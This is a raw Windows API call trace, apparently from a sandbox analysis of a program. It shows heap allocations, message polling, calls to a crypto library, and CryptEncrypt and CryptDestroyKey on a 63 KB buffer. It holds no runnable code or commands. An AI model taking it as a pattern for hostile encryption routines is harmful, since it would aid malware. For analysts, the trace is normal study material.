[0158.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0158.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0158.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0158.673] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xf73d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xf740) returned 1 [0158.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0158.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0158.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0158.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0158.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0158.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0158.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0158.673] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0158.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0158.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0158.673] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.673] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0158.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0158.673] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0158.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0158.674] CharLowerBuffW (in: lpsz="byte[63297]", cchLength=0xb | out: lpsz="byte[63297]") returned 0xb [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0158.674] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0158.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0158.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0158.677] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0158.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0158.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0158.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0158.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0158.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.677] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0158.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0158.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0158.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0158.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0158.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0158.678] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa13768*, pdwDataLen=0x87e820*=0xf73d, dwBufLen=0xf740 | out: pbData=0xa13768*, pdwDataLen=0x87e820*=0xf740) returned 1 [0158.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0158.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0158.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0158.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0158.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0158.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0158.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0158.679] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0158.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0158.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0158.679] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.679] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0158.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0158.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0158.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0158.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0158.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0158.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0158.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0158.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0158.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0158.680] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0158.680] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0158.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0158.680] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0158.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0158.680] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0158.680] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0158.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.680] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0158.680] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0158.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0158.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.680] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0158.680] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0158.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0158.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.681] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.681] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0158.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0158.681] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.681] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.681] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0158.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0158.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0158.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.685] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0158.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.685] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.685] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0158.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0158.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.692] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0158.692] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0158.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0158.692] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0158.692] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0158.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0158.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0158.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0158.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0158.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0158.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0158.692] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.692] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0158.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0158.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0158.692] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0158.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0158.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0158.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0158.693] CryptDestroyKey (hKey=0x90aed8) returned 1 [0158.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0158.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0158.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0158.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0158.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0158.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0158.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0158.695] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0158.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0158.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0158.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0158.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0158.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0158.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0158.696] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0158.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0158.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0158.696] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0158.696] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0158.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0158.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.696] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0158.696] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0158.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0158.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0158.696] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0158.696] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0158.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0158.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0158.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.696] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.696] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0158.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0158.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0158.696] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0158.697] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0158.697] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0158.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0158.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0158.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0158.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0158.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0158.697] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0158.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0158.697] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0158.697] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0158.697] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.697] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0158.697] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0158.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0158.697] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.697] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0158.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0158.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.697] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.698] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0158.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0158.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0158.698] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0158.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0158.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0158.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0158.698] 